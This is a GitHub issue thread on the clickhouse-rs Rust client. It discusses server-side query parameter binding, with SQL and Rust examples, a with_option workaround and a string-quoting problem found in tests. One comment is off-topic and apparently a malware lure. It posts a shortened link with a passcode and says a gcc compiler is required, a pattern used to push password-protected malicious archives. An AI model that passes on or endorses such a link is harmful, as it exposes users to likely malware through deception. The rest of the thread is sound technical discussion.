### ISSUE TITLE
Support server-side parameter binding

### ISSUE THREAD

**Issue by slvrtrn** [ClickHouse/clickhouse-rs#142]
See the [docs](https://clickhouse.com/docs/en/interfaces/http#cli-queries-with-parameters).

For example:

```
SELECT plus({val1: Int32}, {val2: Int32}) AS result
```

We already have `.bind`, though, for client-side substitutions; so maybe it can be done as

```rs
client
    .query("SELECT plus({val1: Int32}, {val2: Int32}) AS result")
    .with_param(42)
    .with_param(144)
    .fetch_one::<i32>()
    .await?;
```

Theoretically, we can even do something like this as well:

```rs
client
    .query("SELECT plus({?}, {?}) AS result")
    .with_param("val1", 42)
    .with_param("val2", 144)
    .fetch_one::<i32>()
    .await?;
```

**Comment by Har33m-Sha1kh** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by slvrtrn** [comment]
It actually works now as:

```rust
use clickhouse::{error::Result, Client};

#[tokio::main]
async fn main() -> Result<()> {
    let client = Client::default()
        .with_url("http://localhost:8123");

    let result = client
        .query("SELECT plus({val1: Int32}, {val2: Int32}) AS result")
        .with_option("param_val1", "42")
        .with_option("param_val2", "144")
        .fetch_one::<u64>()
        .await?;
    println!("Result: {result:?}");

    Ok(())
}
```

But the user has to (properly) serialize the values on the application side.

**Comment by serprex** [comment]
Can create generic method over serializable types

**Comment by serprex** [comment]
So already found issue with basic tests. String `Bind` serializes to `'string'` with quotes which is correct when interpolating into query string, but for server side parameters the string should be unquoted

**Comment by mshustov** [comment]
@serprex closed by https://github.com/ClickHouse/clickhouse-rs/pull/159?
